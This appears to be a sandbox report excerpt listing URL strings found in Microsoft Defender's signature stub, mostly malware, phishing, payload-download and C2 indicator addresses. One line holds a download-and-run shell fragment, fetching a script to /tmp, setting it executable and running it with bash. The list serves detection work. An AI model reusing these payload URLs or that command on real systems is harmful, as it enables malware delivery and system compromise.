Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://kolyherqylwa9ru.top/log.php?f=400
Source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp	String found in binary or memory: http://korserver.com
Source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp	String found in binary or memory: http://kp.9
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://kredytinksao.pl/raw.txt
Source: MpSigStub.exe, 00000026.00000003.18330827201.00000138BE3D8000.00000004.00000001.sdmp	String found in binary or memory: http://kremlin-malwrhunterteam.info/scan.exe
Source: MpSigStub.exe, 00000026.00000003.18306821141.00000138BD516000.00000004.00000001.sdmp	String found in binary or memory: http://krisrnilton.pl/mswiner.exe/payload-obfuscated-final.docx
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://ks.pcgames.com.cn/games_index.jsp?q=%s
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://ks.pconline.com.cn/index.jsp?qx=download&q=%s
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://ktr.freedynamicdns.org/backups/post.php
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://kubusse.ru/data
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://kungsb2africanbestfootballereverinkerso.duckdns.org/kung2doc/
Source: MpSigStub.exe, 00000026.00000003.18335030768.00000138BE917000.00000004.00000001.sdmp	String found in binary or memory: http://kupeer.com/xd
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://kurs.ru/index
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://lab.l4ever.cn/ip/api/
Source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: http://laurenbowling.com/redeem-ucount-rewards-standardbank-credit=card-service/php/
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://lavajatowi.sslblindado.com/
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: http://ldjb.sriki.space/is/cact?i
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://ldvamlwhdpetnyn.ml/liverpool-fc-news/features/
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://led21.pro/wp-content/themes/betheme/images/headers/msg.jpg
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://lem18iuru03vwvqwt.xyz/ff.gif
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://lexandermagic.com/163-97-242097-905-163-97-242097-799/
Source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp	String found in binary or memory: http://lh.cjishu.com/index.php
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://lhx8z06.sed.nutritionservices.com
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://lialer.com/wFBIQQUccZOdYQKJvhxm/ejrwqokckt.exe
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://librebooton.ddns.net/booton.dot
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://libya2020.com.ly/music.mp3
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://lifeandoil.myjino.ru/crg-bin/c/admin/adobe_pdf/adobe.html
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://lightday.pl/wp-content/themes/lightday/images/msg.jpg
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://likesomessfortelr.eu/mSsNX3JDSJD/inNSj398LSj/
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://line.largefamiliesonpurpose.com/
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://lineacount.info/cgi-bin/
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://linkurytest-bumbleb-stats-westeurope.cloudapp.netxi
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://linux.ghststr.com/lllol/0-o/tmp/s.sh&&cd/tmp/&&chmod777s.sh&&bashs.sh-o-2
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://lipostes.tk/98765.pdf
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://livefrom.ge/modules/mod_swfobject/enfo.php
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://liveswindows.cyou/opzi0n1.dll
Source: MpSigStub.exe, 00000026.00000003.18348616803.00000138BCC0C000.00000004.00000001.sdmp	String found in binary or memory: http://liveupdatesnet.com/
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: http://lk2gaflsgh.jgy658snfyfnvh.com/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://ll.protected.secured.adobe
Source: MpSigStub.exe, 00000026.00000003.18338078941.00000138BD104000.00000004.00000001.sdmp	String found in binary or memory: http://lnk.direct/xzx
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://lnkiy.in/cloudfileshare
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://lo0oading.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://local45.net
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://localhost/st.php
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://localhost:4173/BaiduClickerClient.asmx?WSDLx
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://localhost:62338/Chipsetsync.asmx
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://localhost:8000/cmd.exe
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: http://localstormwatch.com
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: http://localstormwatch.comx
Source: MpSigStub.exe, 00000026.00000003.18339634370.00000138BD24F000.00000004.00000001.sdmp	String found in binary or memory: http://logger.mobi
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://logins.kl.com.ua/2.msiequati/.native
Source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp	String found in binary or memory: http://logs-01.loggly.com/inputs
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://loisnfernandez.us/Gold/aafile.exe
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://lookfor.cc/sp.php?pin=%05d
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://lookfor.cc?pin=%05d
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://looking-for.cc
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://looking-for.ccx
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://loscuerposgloriosos.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://lost.to/in.cgi
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: http://lostart.info/js/gs.js
Source: MpSigStub.exe, 00000026.00000003.18309912138.00000138BE5E8000.00000004.00000001.sdmp	String found in binary or memory: http://lowdeck.net/kt2si/2efinys.exe
Source: MpSigStub.exe, 00000026.00000003.18309912138.00000138BE5E8000.00000004.00000001.sdmp	String found in binary or memory: http://lowdeck.net/kt2si/c2syst.exe
Source: MpSigStub.exe, 00000026.00000003.18309912138.00000138BE5E8000.00000004.00000001.sdmp	String found in binary or memory: http://lowdeck.net/kt2si/drmlsh.exe
Source: MpSigStub.exe, 00000026.00000003.18309912138.00000138BE5E8000.00000004.00000001.sdmp	String found in binary or memory: http://lowdeck.net/kt2si/icnsys.exe
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	String found in binary or memory: http://lrelectronics.in/czffkte/
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://ludnica.uk.to/youtube.xpi
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://luport.com/templates/konkur/language/m
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://m.mworld.vn/MWorld30/data20.xm?a=getip&g=3&sex=Android
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://mabira.net/traff/controller.php?&ver=8&uid=
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://macr.microfsot.com/noindex.js
Source: MpSigStub.exe, 00000026.00000003.18348616803.00000138BCC0C000.00000004.00000001.sdmp	String found in binary or memory: http://madthumbs.com/archive/
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://mahathi2.ondemandcreative.com/24.gif
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://mail.8u8y.com/ad/pic/123.txt
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://mail.autoshops.online/gbh.exe
Source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp	String found in binary or memory: http://mail.bg
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://mail.daum.net/kocl/
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://mail.google.com/mail/
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://mail.madcoffee.com/index.php
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://mail.rambler.ru/mail/mail.cgi?mode=compose
Source: MpSigStub.exe, 00000026.00000003.18332386315.00000138BD293000.00000004.00000001.sdmp	String found in binary or memory: http://maindating.com
Source: MpSigStub.exe, 00000026.00000003.18332386315.00000138BD293000.00000004.00000001.sdmp	String found in binary or memory: http://maindating.net
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://maithanhduong.com/.well-known/pki-validation/msg.jpg
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://majelisalanwar.org/wp-content/themes/foodica/assets/css/hp.gf
Source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp	String found in binary or memory: http://makevalue.com
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://maldonaaloverainc.com/
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://malepad.ru:8080/unmount.js
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://malikberry.com/files101/htamandela.hta
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: http://malwarec2domain.com:3550/implant.exe
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: http://man-u.net/vb/send.php
Source: MpSigStub.exe, 00000026.00000003.18310205090.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://march262020.club/files/
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://march262020.com/files/
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://mariafordnude.com/wp/wp-admin/css/colors/coffee/reportexcelindeed.php
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://maringareservas.com.br/queda/index.php
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: http://markpolak.com
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://masgiO.info/cd/cd.php?id=%s&ver=g
Source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp	String found in binary or memory: http://massenzadrillingrig.com/wp-content/plugins/aa/excelz/index.php?email=
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: http://mastiway.me/wp-includes/
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://mazbit.ovh/mykunaahfxqj/3415201.pngqhttp://mazbit.ovh/mykunaahfxqj/dd(oaoabp%&
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://mea45.com/tp/download.php?file=ota4nda5nzm4nl9fx19zzxzrzgl6ztjkcy5legu=-o%appdata%
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://mealpackage.biz/wp-admin/nbn3x/
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://media.licenseacquisition.org/drm_prompt.php
Source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp	String found in binary or memory: http://media.vit
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://mediabusnetwork.com/phandler.php?
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://mediaprovider.info/law/?decinformation=
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://mediasportal.com/phandler.php?sid=500&aid=281&said=9&pn=2&pid=3
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://mediastop.zigg.me
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://mediazone.uni.me/?id=
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://mega975.com.ar/sales-invoice/
Source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp	String found in binary or memory: http://megadowl.com/terms-ru.html
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://meganetop.co.jp/imanager/favicon.php
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://megatoolbar.net/inetcreative/
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://meitao886.com/vass/vasss.doc
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: http://mekund.com/mkcxskjd.exe
Source: MpSigStub.exe, 00000026.00000003.18348616803.00000138BCC0C000.00000004.00000001.sdmp	String found in binary or memory: http://members.concealarea.com/
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://memberservices.passport.net/memberservice.srf
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://metclix.com
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://mexicorxonline.com/glad/imagenes.html?disc=abuse&code=7867213
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://mfjr.info/n2l/tmp/m.vbs
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://michiganpppp.com/work/doc/9.doc
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	String found in binary or memory: http://microhelptech.com/gotoassist/
Source: MpSigStub.exe, 00000026.00000003.18310205090.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://microsoft.browser-security-center.com/blocked.php?id=
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://microsoft.erlivia.ltd/jikolo.doc
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://microsoftdata.linkpc.net/
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://midfielders.ru/in.cgi?3&group=gdz&seoref=http%3a%2f%2fwww.google.com%2furl%3fsa%3dt%26rct%3dj
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://midweekspecials.com/mjrtnfznqsbl/nbsa
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: http://midweekspecials.com/mjrtnfznqsbl/nbsa_
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://millennium-traders.info
Source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp	String found in binary or memory: http://minetopsforums.ru/new_link3.php?site=
Source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp	String found in binary or memory: http://minetopsforums.ru/new_link3.php?site=af
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	String found in binary or memory: http://mining.eligius.st:8337
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://mio98.hk/js_f.php?v=0.0
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://misc.wcd.qq.com/app?packageName=pcqqbrowser&channelId=81529
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://missing-codecs.net
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: http://missing-codecs.org/download/missing_file
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://mitotl.com.mx/ups.com/
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://mixbunch.cn/thread.html
Source: MpSigStub.exe, 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp	String found in binary or memory: http://mmm.media-motor.net/install.php?allowsp2=0&protect=no&ttmr=0&retry=3&aff=aimaddict1&mincook=0
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://mmwrlridbhmibnr.ml/liverpool-fc-news/features/
Source: MpSigStub.exe, 00000026.00000003.18306821141.00000138BD516000.00000004.00000001.sdmp	String found in binary or memory: http://mndyprivatecloudshareandfileprotecthmvb.freeddns.org/receipt/invoice_
Source: MpSigStub.exe, 00000026.00000003.18301521899.00000138BE774000.00000004.00000001.sdmp	String found in binary or memory: http://mnrr.space/c1.xmlx
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://mobilemusicservice.de/43t3f/45y4g.exe
Source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: http://mobilepcstarterkit.com/
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: http://modernizr.com
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	String found in binary or memory: http://mods1401z.webcindario.com
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: http://mog.com/
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://mondaynews.tk/cam/cm.php?v=
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://monergismbooks.com/
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://monergismbooks.com/modules/reportfedexnew.php
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://montiera.com//favicon.ico
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://montiera.com//favicon.icoa
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://mootolola.com/url/YU_ggsetup.html?1218x
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://moscow1.online/proxy/assno.exe
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://moscow1.online/proxy/skapoland.exe
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://mosrezerv.ru/ups/
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://moveis-schuster-com.ga/Order.jpg
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://moveisterrra.com/gb/add.php
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://movie1-share123vn.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18315823751.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://mp.profittrol.com/
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://mp3.baidu.com/
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://mp3.baidu.com/m?tn=
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://mp3.baidu.com/m?tn=baidump3lyric&ct=
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://mp3.zhongsou.com/m?w=%s
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://mp3codecdownload.com
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://mp3codecinstall.net/xcdc/installx?id=
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://mrbfile.xyz/sql/syslib.dll
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://mrdcontact.com/purchaseneworder.doc
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://msjupdate.com/ff/extensions/update.rdf
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://msonlineservers.tk/parcel/dugdhl.php
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://muacangua.com/wp-admin/o_n/
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://muahangvn.blogspot.com
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://mudu.rugeh.ru
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://musah.info/
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://music.cn.yahoo.com/lyric.html?p=%s
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: http://music.emmigo.in/?r=wmp&title=
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://music.soso.com/q?sc=mus&w=%s
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: http://music.tfeed.info/?r=wmp&title=
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://muzdownload.com
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://my-save-img.ru/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://my-save-img.ru/ip2.php
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://my-speak.eu/csioj.exe
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://mybestofferstoday.com/cgi-bin/main.cgi?__rnd__
Source: MpSigStub.exe, 00000026.00000003.18348332135.00000138BE958000.00000004.00000001.sdmp	String found in binary or memory: http://mydirecttube.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://myip.dnsomatic.com
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://myliverpoolnews.cf/liverpool-fc-news/features/
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://myplanet.group/xuxzryvq1/ind.html
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	String found in binary or memory: http://myredir.net/K_
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://mysearchpage.biz/customizesearch.html
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://mysearchpage.biz/home.html
